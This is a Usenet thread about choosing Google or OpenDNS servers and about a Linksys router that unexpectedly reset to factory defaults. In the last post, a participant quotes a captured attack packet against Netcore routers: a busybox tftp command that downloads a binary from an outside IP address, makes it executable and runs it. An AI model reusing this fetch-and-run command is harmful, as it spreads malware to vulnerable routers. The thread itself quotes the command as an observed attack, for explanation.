f



What should I change my DNS to?

There are a number of DNS servers on the Internet that one can choose from:

Google Public DNS:
Primary: 8.8.8.8
Secondary: 8.8.4.4

OpenDNS:
208.67.222.222
208.67.220.220

Or signing up for Premium DNS
https://signup.opendns.com/premiumdns/

What do the experts here recommend?
0
F
9/5/2016 11:32:48 PM
comp.os.linux.networking 15677 articles. 0 followers. Post Follow

57 Replies
406 Views

Similar Articles

[PageSpeed] 45

On Tue, 6 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in article
<nqkvau$t8n$1@gioia.aioe.org>, F Volker wrote:

>There are a number of DNS servers on the Internet that one can choose
>from:

Yeah, there are at least a dozen one can use - but what are you looking
for?  Are you concerned that the DNS of your ISP is spying on you?
Are you looking for possible speed improvements?   Are you worried about
censorship?

>What do the experts here recommend?

Depends on what you are looking for -  heck, you could even run your
OWN DNS server (search for a copy of the DNS-HOWTO) - but if you do,
be sure to restrict access to it so that it doesn't get abused by
free-loaders and bad-guys out on the Internet.

        Old guy
0
Moe
9/6/2016 3:35:38 AM
On 09/06/2016 10:35 AM, Moe Trin wrote:

[cut for brevity]

> Are you concerned that the DNS of your ISP is spying on you?
> Are you looking for possible speed improvements? Are you worried about
> censorship?

Yes, yes and yes (privacy is my main concern).

>> What do the experts here recommend?
>
> Depends on what you are looking for -  heck, you could even run your
> OWN DNS server (search for a copy of the DNS-HOWTO) - but if you do,
> be sure to restrict access to it so that it doesn't get abused by
> free-loaders and bad-guys out on the Internet.

I am not a technical person and wouldn't want to attempt running my own 
DNS server. Though I am using a paid VPN service mainly for p2p 
downloads am considering utilising the VPN service much more frequently.

The reason for my inquiry is I experienced something very peculiar 
yesterday...
I reside in a third world country within the SE Asia region. Power 
outages are regular events. An UPS is essential and it's working as 
expected. Connected to the UPS is a desktop computer, monitor and 
router. Before bedtime I shut down the computer and switch off the power 
supply for UPS. This ensures not to be awakened by the UPSs obnoxious 
alarm tone if a power outage occurs during the night .

The day before yesterday I added DNS 8.8.8.8,8.8.4.4. to my (Linksys) 
router (there weren't any other entries added before) and changed my 
Wireless password (pass phrase) and Gateway username/password (I have 
done this numerous times before). I rebboted and the new set-up seemed 
successful as I did not encounter any 'glitches' during the remainder of 
the day. I also accessed the configuration details of the router three 
times to make sure the new Gatway username/password is working.

When switching on the UPS yesterday the router led light indicating 
Internet connection turned 'red' as opposed to expected 'green'.

I booted the computer, rebooted, disconnected the power for the router 
but wasn't able to achieve an Internet connection.

It never occurred to my accessing the router settings!

I called the ISP explaining my plight; After a few minutes waiting their 
technical staff advised to reconfigure my router - an answer I did not 
expect.

Well, this is the part which concerns me - my Gateway password was 
rejected, I tried several times but without success. So, instead of 
entering my specific username/password I used 'admin' for both Gateway 
user name and Gateway password and at this very instant was able to 
access my router details. However, all my specific router configurations 
were gone (as someone or something had re-set the router) and I had 
start all over again.
I have no explanation for this occurrence and am sure my ISP would not 
want to comment on this issue.
Could it be that my router got hacked by my ISP? What can I do to avoid 
this from happening again? I am on Linux Mint 17.3 KDE.

0
F
9/6/2016 6:48:32 AM
On 2016-09-06, F Volker <here@home.net> wrote:
> On 09/06/2016 10:35 AM, Moe Trin wrote:
>
> [cut for brevity]
>
>> Are you concerned that the DNS of your ISP is spying on you?
>> Are you looking for possible speed improvements? Are you worried about
>> censorship?
>
> Yes, yes and yes (privacy is my main concern).
>
>>> What do the experts here recommend?
>>
>> Depends on what you are looking for -  heck, you could even run your
>> OWN DNS server (search for a copy of the DNS-HOWTO) - but if you do,
>> be sure to restrict access to it so that it doesn't get abused by
>> free-loaders and bad-guys out on the Internet.
>
> I am not a technical person and wouldn't want to attempt running my own 
> DNS server. Though I am using a paid VPN service mainly for p2p 
> downloads am considering utilising the VPN service much more frequently.
>
> The reason for my inquiry is I experienced something very peculiar 
> yesterday...
> I reside in a third world country within the SE Asia region. Power 
> outages are regular events. An UPS is essential and it's working as 
> expected. Connected to the UPS is a desktop computer, monitor and 
> router. Before bedtime I shut down the computer and switch off the power 
> supply for UPS. This ensures not to be awakened by the UPSs obnoxious 
> alarm tone if a power outage occurs during the night .
>
> The day before yesterday I added DNS 8.8.8.8,8.8.4.4. to my (Linksys) 
> router (there weren't any other entries added before) and changed my 
> Wireless password (pass phrase) and Gateway username/password (I have 
> done this numerous times before). I rebboted and the new set-up seemed 
> successful as I did not encounter any 'glitches' during the remainder of 
> the day. I also accessed the configuration details of the router three 
> times to make sure the new Gatway username/password is working.
>
> When switching on the UPS yesterday the router led light indicating 
> Internet connection turned 'red' as opposed to expected 'green'.
>
> I booted the computer, rebooted, disconnected the power for the router 
> but wasn't able to achieve an Internet connection.
>
> It never occurred to my accessing the router settings!
>
> I called the ISP explaining my plight; After a few minutes waiting their 
> technical staff advised to reconfigure my router - an answer I did not 
> expect.
>
> Well, this is the part which concerns me - my Gateway password was 
> rejected, I tried several times but without success. So, instead of 
> entering my specific username/password I used 'admin' for both Gateway 
> user name and Gateway password and at this very instant was able to 
> access my router details. However, all my specific router configurations 
> were gone (as someone or something had re-set the router) and I had 
> start all over again.
> I have no explanation for this occurrence and am sure my ISP would not 
> want to comment on this issue.
> Could it be that my router got hacked by my ISP? What can I do to avoid 
> this from happening again? I am on Linux Mint 17.3 KDE.
>

Sounds like your router reset itself. Hardware fault? Intrnal battery
failure-- if it has a battery?

Note that changing your dns does absolutely nothing to protect you from
your ISP, if that was the problem ( no idea how it could have been).
Your ISP is still the one that connects you to the internet. DNS is
simply a "name to address" translation service. It is like trying to
protect your house against breakins by changing the font of your
housenumbers on your house.

0
William
9/6/2016 7:25:53 AM
On 09/06/2016 02:25 PM, William Unruh wrote:

[cut]

> Sounds like your router reset itself.

I'd be truly relieved if this was be cause!

> Hardware fault?

Yes, this is not to be discounted - the Linksys WAG200G router is not a 
spring chicken anymore; An upgrade might be in order.

> Internal battery failure-- if it has a battery?

The motherboard is accommodating a battery which I change annually; I 
can't think of any other component containing a battery.

> Note that changing your dns does absolutely nothing to protect you from
> your ISP, if that was the problem ( no idea how it could have been).
> Your ISP is still the one that connects you to the internet. DNS is
> simply a "name to address" translation service. It is like trying to
> protect your house against breakins by changing the font of your
> housenumbers on your house.

Thanks for clarifying this.
Going back to my original question, which DNS server is preferred -
Google Public or OpenDNS?


0
F
9/6/2016 7:53:14 AM
F Volker wrote:
> On 09/06/2016 02:25 PM, William Unruh wrote:
>> [snip]
>> Internal battery failure-- if it has a battery?
>
> The motherboard is accommodating a battery which I change annually; I 
> can't think of any other component containing a battery.

If you're talking about your PC motherboard, those batteries last 3-5
years on average.  Not that it really matters though.

>
>> Note that changing your dns does absolutely nothing to protect you from
>> your ISP, if that was the problem ( no idea how it could have been).
>> Your ISP is still the one that connects you to the internet. DNS is
>> simply a "name to address" translation service. It is like trying to
>> protect your house against breakins by changing the font of your
>> housenumbers on your house.
>
> Thanks for clarifying this.
> Going back to my original question, which DNS server is preferred -
> Google Public or OpenDNS?

I've switched back and forth between them over the years.  They both
"just work"; it really comes down to whether or not you want Google
knowing your DNS lookups.


-- 
|_|O|_| Registered Linux user #585947
|_|_|O| Github: https://github.com/dpurgert
|O|O|O| 
0
Dan
9/6/2016 9:40:17 AM
On 2016-09-06, F Volker <here@home.net> wrote:
> On 09/06/2016 02:25 PM, William Unruh wrote:
>
> [cut]
>
>> Sounds like your router reset itself.
>
> I'd be truly relieved if this was be cause!
>
>> Hardware fault?
>
> Yes, this is not to be discounted - the Linksys WAG200G router is not a 
> spring chicken anymore; An upgrade might be in order.
>
>> Internal battery failure-- if it has a battery?
>
> The motherboard is accommodating a battery which I change annually; I 
> can't think of any other component containing a battery.

I meant that the router might have an internal battery to keep the
settings alive through switchoffs. <i have no idea if they do.

>
>> Note that changing your dns does absolutely nothing to protect you from
>> your ISP, if that was the problem ( no idea how it could have been).
>> Your ISP is still the one that connects you to the internet. DNS is
>> simply a "name to address" translation service. It is like trying to
>> protect your house against breakins by changing the font of your
>> housenumbers on your house.
>
> Thanks for clarifying this.
> Going back to my original question, which DNS server is preferred -
> Google Public or OpenDNS?
>
For what purpose? Why not stay with your ISPs DNS server? What is the
switch supposed to accomplish for you? To first order there is not
difference between DNS servers. To second order there might be a reason
to use one over the other (eg if you are using a VPN and want to hide
your DNS queries from your ISP.) 
0
William
9/6/2016 10:35:40 AM
William Unruh wrote:
> [snip]
> I meant that the router might have an internal battery to keep the
> settings alive through switchoffs. <i have no idea if they do.

I've only seen this as a "feature" on ISP CPE devices that act as phone
gateways for their VoIP services.  Most off-the-shelf things (from
linksys, et. al.) don't seem to have this as an onboard feature.

> [snip]
> For what purpose? Why not stay with your ISPs DNS server? What is the
> switch supposed to accomplish for you? To first order there is not
> difference between DNS servers. To second order there might be a reason
> to use one over the other (eg if you are using a VPN and want to hide
> your DNS queries from your ISP.) 

Or, your ISP's servers are simply slow to respond (mine are / were, so I
went with rolling my own, and then forwarding to opendns).


-- 
|_|O|_| Registered Linux user #585947
|_|_|O| Github: https://github.com/dpurgert
|O|O|O| 
0
Dan
9/6/2016 11:09:16 AM
On 2016-09-06 08:48, F Volker wrote:

....

> Well, this is the part which concerns me - my Gateway password was
> rejected, I tried several times but without success. So, instead of
> entering my specific username/password I used 'admin' for both Gateway
> user name and Gateway password and at this very instant was able to
> access my router details. However, all my specific router configurations
> were gone (as someone or something had re-set the router) and I had
> start all over again.
> I have no explanation for this occurrence and am sure my ISP would not
> want to comment on this issue.
> Could it be that my router got hacked by my ISP? What can I do to avoid
> this from happening again? I am on Linux Mint 17.3 KDE.

I doubt it would be a hack attempt, as the hackers would surely change
the login/pass to one of their own to deny you access. Or, not change it
at all from the one you set, so that you do not notice anything.

This looks rather like a chance reset. Like, a single bit flops, the
router notices the checksum does not match, and resets it all for
safety. Same thing the BIOS of a PC does to its own configuration stored
in CMOS.

You could google to find out if other people complain of random resets
of this same router model.


Like others, I do not think this is at all related to your DNS
choice(1). If you are paranoid about privacy, then run your own DNS.
Otherwise, it depends on whether you trust more your ISP or Google or
openDNS (or other), or which is faster.


(1) Unless the memory location where the DNS is stored happens to be
faulty :-P

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/6/2016 11:35:07 AM
On Tuesday 06 Sep 2016 13:35, Carlos E. R. conveyed the following to 
comp.os.linux.networking...

> On 2016-09-06 08:48, F Volker wrote:
> 
>> Well, this is the part which concerns me - my Gateway password was
>> rejected, I tried several times but without success. So, instead of
>> entering my specific username/password I used 'admin' for both
>> Gateway user name and Gateway password and at this very instant was
>> able to access my router details. However, all my specific router
>> configurations were gone (as someone or something had re-set the
>> router) and I had start all over again.
>> I have no explanation for this occurrence and am sure my ISP would
>> not want to comment on this issue.
>> Could it be that my router got hacked by my ISP? What can I do to
>> avoid this from happening again? I am on Linux Mint 17.3 KDE.
> 
> I doubt it would be a hack attempt, as the hackers would surely change
> the login/pass to one of their own to deny you access. Or, not change
> it at all from the one you set, so that you do not notice anything.
> 
> This looks rather like a chance reset. Like, a single bit flops, the
> router notices the checksum does not match, and resets it all for
> safety. Same thing the BIOS of a PC does to its own configuration
> stored in CMOS.
> 
> You could google to find out if other people complain of random resets
> of this same router model.

I've already had that happen a couple of times with a Linksys WRT54GL.  
It's usually due to atmospheric conditions ─ high plasma content in the 
air, cosmic rays, et al.  These things don't have ECC memory and they're 
poorly shielded.

In my own experience, there were two levels of severity to this kind of 
disruption:

  1. Only the wireless settings were botched, and my WiFi network was
     wide open, but the LAN settings were unaffected.

  2. Everything was botched, and even the IP range for my LAN was reset
     back to the default range of 192.168.x.x, while my workstation
     expects it to be in the 10.0.x.x range.

-- 
= Aragorn =
0
Aragorn
9/6/2016 12:06:57 PM
On 2016-09-06 14:06, Aragorn wrote:

> I've already had that happen a couple of times with a Linksys WRT54GL.  
> It's usually due to atmospheric conditions ─ high plasma content in the 
> air, cosmic rays, et al.  These things don't have ECC memory and they're 
> poorly shielded.

Ah, ECC memory. Well, errors in the config memory can be detected by a
simple checksum byte(s). I assume it is a flash chip of some kind. Or a
partition in the main flash memory, perhaps.

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/6/2016 12:27:01 PM
On 2016-09-06, F Volker <here@home.net> wrote:
> I am not a technical person and wouldn't want to attempt running my own 
> DNS server. Though I am using a paid VPN service mainly for p2p 
> downloads am considering utilising the VPN service much more frequently.

Check with your VPN provider. Some provide their own DNS server(s) as part
of the service.

> Well, this is the part which concerns me - my Gateway password was 
> rejected, I tried several times but without success. So, instead of 
> entering my specific username/password I used 'admin' for both Gateway 
> user name and Gateway password and at this very instant was able to 
> access my router details. However, all my specific router configurations 
> were gone (as someone or something had re-set the router) and I had 
> start all over again.

It's not that unusual. I've seen this happen with power surges, sometimes
for no apparent reason other than buggy firmware.

-- 
-----------------------------------------------------------------------------
  Roger Blake (Posts from Google Groups killfiled due to excess spam.)

  NSA sedition and treason        -- http://www.DeathToNSAthugs.com
  Don't talk to cops!             -- http://www.DontTalkToCops.com
  Badges don't grant extra rights -- http://www.CopBlock.org
-----------------------------------------------------------------------------
0
Roger
9/6/2016 12:54:17 PM
Carlos E. R. wrote:
> On 2016-09-06 14:06, Aragorn wrote:
>
>> I've already had that happen a couple of times with a Linksys WRT54GL.  
>> It's usually due to atmospheric conditions ─ high plasma content in the 
>> air, cosmic rays, et al.  These things don't have ECC memory and they're 
>> poorly shielded.
>
> Ah, ECC memory. Well, errors in the config memory can be detected by a
> simple checksum byte(s). I assume it is a flash chip of some kind. Or a
> partition in the main flash memory, perhaps.
>
Doesn't help when the botched config is the running config though ;)


-- 
|_|O|_| Registered Linux user #585947
|_|_|O| Github: https://github.com/dpurgert
|O|O|O| 
0
Dan
9/6/2016 1:03:59 PM
On 2016-09-06 15:03, Dan Purgert wrote:
> Carlos E. R. wrote:
>> On 2016-09-06 14:06, Aragorn wrote:
>>
>>> I've already had that happen a couple of times with a Linksys WRT54GL.  
>>> It's usually due to atmospheric conditions ─ high plasma content in the 
>>> air, cosmic rays, et al.  These things don't have ECC memory and they're 
>>> poorly shielded.
>>
>> Ah, ECC memory. Well, errors in the config memory can be detected by a
>> simple checksum byte(s). I assume it is a flash chip of some kind. Or a
>> partition in the main flash memory, perhaps.
>>
> Doesn't help when the botched config is the running config though ;)

Right, but normally the device should check that the checksum matches
when booting, and if it doesn't, reset to factory defaults, which is
what happened to the OP, IMO: he got factory defaults, including the
password.

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/6/2016 3:01:08 PM
Carlos E. R. wrote:
> On 2016-09-06 15:03, Dan Purgert wrote:
>> [snip]
>> Doesn't help when the botched config is the running config though ;)
>
> Right, but normally the device should check that the checksum matches
> when booting, and if it doesn't, reset to factory defaults, which is
> what happened to the OP, IMO: he got factory defaults, including the
> password.
>

Ah, I was taking it in the context of Aragorn's comments about devices
just going stupid (and ecc ram maybe helping), rather than "broke on
reboot".

Broke on reboot should absolutely have some form of checksumming.  Not
that we're ever likely to see it.

-- 
|_|O|_| Registered Linux user #585947
|_|_|O| Github: https://github.com/dpurgert
|O|O|O| 
0
Dan
9/6/2016 4:25:43 PM
On 6.9.16 19:25, Dan Purgert wrote:
> Carlos E. R. wrote:
>> On 2016-09-06 15:03, Dan Purgert wrote:
>>> [snip]
>>> Doesn't help when the botched config is the running config though ;)
>>
>> Right, but normally the device should check that the checksum matches
>> when booting, and if it doesn't, reset to factory defaults, which is
>> what happened to the OP, IMO: he got factory defaults, including the
>> password.
>>
>
> Ah, I was taking it in the context of Aragorn's comments about devices
> just going stupid (and ecc ram maybe helping), rather than "broke on
> reboot".
>
> Broke on reboot should absolutely have some form of checksumming.  Not
> that we're ever likely to see it.
>

Could it be as simple as forgetting to save the changed parameters
before reboot?

-- 

-TV

0
Tauno
9/6/2016 6:37:27 PM
On Tue, 6 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in article
<nqlslb$2ct$1@gioia.aioe.org>, F Volker wrote:

One reply to multiple posts

>> I am not a technical person and wouldn't want to attempt running my
>> own DNS server.

It's actually relatively simple.  I'm not experienced with Mint, but
both Debian and Ubuntu had a single package that did most of the work.

>> Though I am using a paid VPN service mainly for p2p downloads am
>> considering utilising the VPN service much more frequently.

I'd look to see if the VPN service offers DNS

>Connected to the UPS is a desktop computer, monitor and router.

Consider changing your DNS settings on the computer, rather than the
router.  Now, the computer is looking at the "DNS Server" (actually a
forwarder) on the router.  I wouldn't expect the router ON IT'S OWN to
be needing DNS - the router is merely forwarding IP packets.  Having a
"DNS Server" on the router is meant to make setting up the computers
on your LAN simpler (one place to screw up, not many) ;-)

>> When switching on the UPS yesterday the router led light indicating 
>> Internet connection turned 'red' as opposed to expected 'green'.

Router lost it's mind (configuration).

>> I called the ISP explaining my plight; After a few minutes waiting
>> their technical staff advised to reconfigure my router - an answer I
>> did not expect.

The usual problem - the customer has done "something" to the router, so
the ISP hell-desk people reach in (if they can) and reset things to the
factory defaults.   Not a reflection on you, but most customers haven't
any idea what they are doing, and resetting things to the factory default
will get things "running".  May not be safest, but is easiest for them.

>> So, instead of  entering my specific username/password I used 'admin'
>> for both Gateway user name and Gateway password and at this very
>> instant was able to access my router details. However, all my
>> specific router configurations were gone (as someone or something had
>> re-set the router) and I had start all over again.

Yup - all so standard

>> Could it be that my router got hacked by my ISP?

I wouldn't call it hacking - but a reset to a "known" working condition.

> What can I do to avoid this from happening again?

It may be time to replace the router - but the idea of the hell desk
being able to reset things is a cost saving measure.  An alternative
might be having a reset button on the router, and when things fail, the
help desk staff tells you to push that button.  Is that a better choice?
Maybe yes, maybe no.  They could also send out a tech to your house to
reset things, but that is sure to cost you more.

>I am on Linux Mint 17.3 KDE.

That's the computer, not the router.  The problem was on the router.
You do have to pay attention to that choice of router.   Over the past
month here (600 km East of Los Angeles), I've seen hundreds of attempts
to connect to a wireless router (made in China, massive security hole
discovered/reported three years ago, and never fixed). I wouldn't mind
so much, except that the router (Netcore) was mainly sold in China and
to a lesser extent, elsewhere in Southeast Asia - why would the idiots
be trying to hack something that was never here?

>Going back to my original question, which DNS server is preferred -
>Google Public or OpenDNS?

Both "work" - but understand that the sole reason for the existence of
google is to provide "targeted" advertising, based on what they learn
about you.   OpenDNS is less obvious, but you're not getting something
for nothing.   From a privacy standpoint, it doesn't really matter that
much - your ISP (or VPN provider) can still see who you are looking for
and/or connecting to.

        Old guy
0
Moe
9/6/2016 9:36:02 PM
On 2016-09-06 20:37, Tauno Voipio wrote:

> Could it be as simple as forgetting to save the changed parameters
> before reboot?

In that case it would retain the previous settings, which should be
consistent. The checksum would match the contents. Not the contents you
expected, but as far as the firmware is concerned, correct. So no reset
to defaults.

Something that might happen is the firmware forgetting to recalculate
the checksum after writing the changed config. But such a tremendous bug
I don't see them doing, unless very bad programmers. Or insufficiently paid.


-- 
Cheers,
       Carlos E.R.
0
Carlos
9/6/2016 9:42:02 PM
On 2016-09-06 23:36, Moe Trin wrote:


> Consider changing your DNS settings on the computer, rather than the
> router.  Now, the computer is looking at the "DNS Server" (actually a
> forwarder) on the router.  I wouldn't expect the router ON IT'S OWN to
> be needing DNS - the router is merely forwarding IP packets.  Having a
> "DNS Server" on the router is meant to make setting up the computers
> on your LAN simpler (one place to screw up, not many) ;-)

That is so.

But there are some minor uses for a DNS by the router itself. For
instance, my router queries a time server to get the current time. The
time server is defined by name. Or the router may be configured to use
dyndns or similar, also by name.


>>> I called the ISP explaining my plight; After a few minutes waiting
>>> their technical staff advised to reconfigure my router - an answer I
>>> did not expect.
> 
> The usual problem - the customer has done "something" to the router, so
> the ISP hell-desk people reach in (if they can) and reset things to the
> factory defaults.   Not a reflection on you, but most customers haven't
> any idea what they are doing, and resetting things to the factory default
> will get things "running".  May not be safest, but is easiest for them.

Ah, I did not consider that one.



-- 
Cheers,
       Carlos E.R.
0
Carlos
9/6/2016 10:48:00 PM
On 09/06/2016 05:35 PM, William Unruh wrote:

[cut]

> For what purpose? Why not stay with your ISPs DNS server? What is the
> switch supposed to accomplish for you? To first order there is not
> difference between DNS servers.

Although my technical knowledge is limited, I am trying to better myself 
by reading pertinent publications etc..
My reason for not staying with the ISPs DNS server is covered under: 
"Why Change Your Router's DNS Setting"
<http://m.setuprouter.com/router/linksys/wag200g/dns.htm>
The article does not explain the differences between the two options 
hence my inquiry here.
Be that as it may, I feel that the speed for accessing websites has 
increased ever so slightly but this may just be an imaginary impression.

> To second order there might be a reason
> to use one over the other (eg if you are using a VPN and want to hide
> your DNS queries from your ISP.)

Yes, a VPN service gives me comfort relating to privacy issues.
I just haven't figured out on avoiding security checks imposed by the 
e-mail accounts when switching from my regular ISP account to my VPN and 
access my e-mail accounts. This is a real PITA which I am going to bring 
up in an appropriate newsgroup/forum.
0
F
9/7/2016 1:53:10 AM
On 09/07/2016 04:36 AM, Moe Trin wrote:

[cut]

> It's actually relatively simple.  I'm not experienced with Mint, but
> both Debian and Ubuntu had a single package that did most of the work.

I look into that, thanks.

>>> Though I am using a paid VPN service mainly for p2p downloads am
>>> considering utilising the VPN service much more frequently.
>
> I'd look to see if the VPN service offers DNS

They suggest using Google Public DNS

> Consider changing your DNS settings on the computer, rather than the
> router.  Now, the computer is looking at the "DNS Server" (actually a
> forwarder) on the router.  I wouldn't expect the router ON IT'S OWN to
> be needing DNS - the router is merely forwarding IP packets.  Having a
> "DNS Server" on the router is meant to make setting up the computers
> on your LAN simpler (one place to screw up, not many) ;-)

I changed the DNS settings to Google Public DNS as suggested by My VPN 
provider and hope that settings in both router and LAN work harmoniously.

[cut]

> The usual problem - the customer has done "something" to the router, so
> the ISP hell-desk people reach in (if they can) and reset things to the
> factory defaults.   Not a reflection on you, but most customers haven't
> any idea what they are doing,..."

Well, the changes I made over the past few years in the router 
configurations went quite uneventful. But then again there is always a 
first time... The changes I made were always related to user-names, 
pass-words & pass-phrases, time-zones, and ensuring that some settings 
were enabled/disabled e.g. Firewall Protection or UPnP etc.. FWIW, I 
never attempted to change setting in any PortForwarding tabs.

> "...and resetting things to the factory default
> will get things "running".  May not be safest, but is easiest for them.

If I read this correctly you are suggesting that the ISP changed the 
settings of my router. I assumed by changing the default login gateway 
username and gateway password would prevent anybody accessing my router 
including staff of ISP; Am I mistaken?

> It may be time to replace the router -

Because the equipment is relatively old I am now considering replacing 
computer and router.

>> Going back to my original question, which DNS server is preferred -
>> Google Public or OpenDNS
> Both "work" - but understand that the sole reason for the existence of
> google is to provide "targeted" advertising, based on what they learn
> about you. OpenDNS is less obvious, but you're not getting something
> for nothing. From a privacy standpoint, it doesn't really matter that
> much - your ISP (or VPN provider) can still see who you are looking for
> and/or connecting to.

Noted, thanks

0
F
9/7/2016 2:13:32 AM
On 2016-09-07 04:13, F Volker wrote:

>> "...and resetting things to the factory default
>> will get things "running".  May not be safest, but is easiest for them.
> 
> If I read this correctly you are suggesting that the ISP changed the
> settings of my router. I assumed by changing the default login gateway
> username and gateway password would prevent anybody accessing my router
> including staff of ISP; Am I mistaken?

The suggestion is that they reset the router to factory defaults,
deleting all your settings including the password, in the thought that
this would make things work, because defaults work for most people. A
dangerous thing to do without asking the client, IMO.

Accessing via http or ssh and login/password is not the only method.
Some routers have ports for remote administration with a program the ISP
may have. Typically it is only allowed from a range of fixed IPs (on the
ISP headquarters), and may have different authentication method that
your login password.

To disable you have to find that configuration and consider disable it.

Disabling it will impede the ISP from updating the firmware, for those
ISPs that do it, and other things they are supposed to do.

Mine works that way, but not all do.


-- 
Cheers,
       Carlos E.R.
0
Carlos
9/7/2016 2:26:05 AM
On 09/06/2016 06:35 PM, Carlos E. R. wrote:

[cut]

> I doubt it would be a hack attempt, as the hackers would surely change
> the login/pass to one of their own to deny you access. Or, not change it
> at all from the one you set, so that you do not notice anything.

This is comforting to know!

> This looks rather like a chance reset. Like, a single bit flops, the
> router notices the checksum does not match, and resets it all for
> safety. Same thing the BIOS of a PC does to its own configuration stored
> in CMOS.

This could well be the case considering the age of computer, motherboard 
and router.

> You could google to find out if other people complain of random resets
> of this same router model.

Lots of search results, need to do some serious reading...

[cut]

> (1) Unless the memory location where the DNS is stored happens to be
> faulty :-P

Maybe you could elaborate on this please, because some time ago I indeed 
experienced some problems related to the 'memory' sticks installed to 
the motherboard.

My desktop is about 9 years old and the RAM was upgraded from 2GiB to 
4GiB a couple of years ago or so.
Motherboard details:
American Megatrends Inc.
ASUSTeK Computer INC.
P5GC-MX/1333
Version: 0310
ASUS UPDATE: V7.10.05
Release date: 24 December 2007

Long story short, a recent memtest failed miserably and unbeknownst to 
me this particular motherboard apparently does not like to be upgraded 
in terms of RAM because when I inserting the old (original) RAM sticks 
the memtest passed with flying colours. The old BIOS most probably is 
for whatever reason rejecting the modules with higher RAM.

Maybe 'old age' of equipment, insufficient RAM is the cause for all this 
and it's time to purchase both a new machine and router.

0
F
9/7/2016 2:26:34 AM
On 09/06/2016 07:54 PM, Roger Blake wrote:

[cut]

> It's not that unusual. I've seen this happen with power surges, sometimes
> for no apparent reason other than buggy firmware.

I feel comforted that the consent here is that this glitch is not 
related to any hacking attempts to access my computer networks.
0
F
9/7/2016 2:28:04 AM
On 09/07/2016 09:26 AM, Carlos E. R. wrote:

[cut]

> The suggestion is that they reset the router to factory defaults,
> deleting all your settings including the password, in the thought that
> this would make things work, because defaults work for most people. A
> dangerous thing to do without asking the client, IMO.

As far as I am concerned there wasn't even a reason to access my router 
in the first place; I never reported any issues... I've done what I did 
many times before. My hopeful thinking is that it may have been just 
glitch somewhere along when resetting some of the settings.

> Accessing via http or ssh and login/password is not the only method.
> Some routers have ports for remote administration with a program the ISP
> may have. Typically it is only allowed from a range of fixed IPs (on the
> ISP headquarters), and may have different authentication method that
> your login password.
>
> To disable you have to find that configuration and consider disable it.
>
> Disabling it will impede the ISP from updating the firmware, for those
> ISPs that do it, and other things they are supposed to do.

Very interesting, thanks! I am going to register with a Linksys forum 
and try find out more on this.

> Mine works that way, but not all do.

Mine is pretty old and may not have this feature.

0
F
9/7/2016 2:41:41 AM
On Tue, 6 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in article
<20160906084938@news.eternal-september.org>, Roger Blake wrote:

]On Tue, 6 Sep 2016, F Volker wrote:

]I reside in a third world country within the SE Asia region. Power 
]outages are regular events. An UPS is essential and it's working as 
]expected. Connected to the UPS is a desktop computer, monitor and 
]router.

>> However, all my specific router configurations were gone (as someone
>> or something had re-set the router) and I had start all over again.

>It's not that unusual. I've seen this happen with power surges,
>sometimes for no apparent reason other than buggy firmware.

He's got an unidentified UPS for power, and that _should_ reduce the
chance of power-surges, etc.  I'm more concerned that the router may
be being reset to factory default, because every skript-kiddie in the
world knows it reverts to the admin:admin password pair.

Mind you, back in the mid 1970s, I was supporting some (US) FAA
experimental electronics at an airfield in California's Central Valley
about 75 miles / 120 km Southeast of San Francisco.  This was prime
farming country because it was/is irrigated from canals or deep wells.
This means honking BIG electrically powered pumps (100 HP = 75 KVA)
and when they were turned on, I swear you could see the power poles
vibrating from the surges.   Our equipment had "overkill" (for the
time) surge protection, LC filters, Metal Oxide Varistors, and such,
but I was still loosing one or two power supplies a month due to
surges.   We eventually added a set of Control Concepts "Isolatrols"
which were an active tracking power-line filter.  They weren't cheap
(US$275 in 1975 for a 115 VAC 15 Amp unit), but they completely
eliminated the surge problems.  In 1978, I bought two units for the
house (protecting the home entertainment stuff).   When we got our 
first home computer in 1981, I added another unit for that.  When we
bought additional computers in the mid-80s, we also added UPS units,
but I'm still using those Isolatrols to protect the UPSs.

        Old guy
0
Moe
9/7/2016 3:29:56 AM
On 09/07/2016 09:26 AM, Carlos E. R. wrote:

[cut]

> Accessing via http or ssh and login/password is not the only method.
> Some routers have ports for remote administration with a program the ISP
> may have. Typically it is only allowed from a range of fixed IPs (on the
> ISP headquarters), and may have different authentication method that
> your login password.
>
> To disable you have to find that configuration and consider disable it.
>
> Disabling it will impede the ISP from updating the firmware, for those
> ISPs that do it, and other things they are supposed to do.
>
> Mine works that way, but not all do.

UPDATE:-
I accessed my router details and can happily report that under 
Administration===>Management-tab, the Remote Management 'radio button' 
indicates "Disable", as does Remote Upgrade, SNMP, UPnP, IGM Proxy and 
Management via WLAN.

Based on this configuration we can assume that the ISP did not or would 
not be able to access my router.



0
F
9/7/2016 3:59:45 AM
On Wed, 7 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in article
<tea4ad-o1h.ln1@minas-tirith.valinor>, Carlos E. R. wrote:

>Accessing via http or ssh and login/password is not the only method.
>some routers have ports for remote administration with a program the ISP
>may have.

[dawn ~]$ whatis tcpdump
tcpdump (8)    - dump traffic on a network
[dawn ~]$ 

(paraphrased from "/usr/sbin/tcpdump -ns 1536 -A" output)

20:01:37.712495 IP 95.71.28.20.53393 > 192.0.2.211.53413: UDP, length 18
AAAAAAAAnetcore.

20:01:37.713509 IP 95.71.28.20.53393 > 192.0.2.211.53413: UDP, length 123
AA..AAAA cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g
91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

91.134.141.49 is French OVH SAS  49.ip-91-134-141.eu.   My upstream now
blocks packets to/from that ASN.  If that inconveniences them... tough.

Don't forget that UDP is connectionless, and the SOURCE address (here,
some "NXDOMAIN" in ROSTELCOM) could be faked.  The address of the nasty
on the other hand WAS (at the time) valid, and there was a nasty piece of
malware they were sourcing.

Anyone stupid enough to be using a Netcore router (which the manufacturer
never bothered to patch, much less acknowledge the problem) should be
finding a replacement (3 years ago, when it was first reported).

>Typically it is only allowed from a range of fixed IPs (on the ISP
>headquarters), and may have different authentication method that your
> login password.

Above - UDP is connectionless and can be TRIVIALLY faked,  TCP is harder
but not foolproof (or even fool-resistant).

>To disable you have to find that configuration and consider disable it.

>Disabling it will impede the ISP from updating the firmware, for those
>ISPs that do it, and other things they are supposed to do.

    my LANs  ------  firewall ------- router  ------  nasty_world

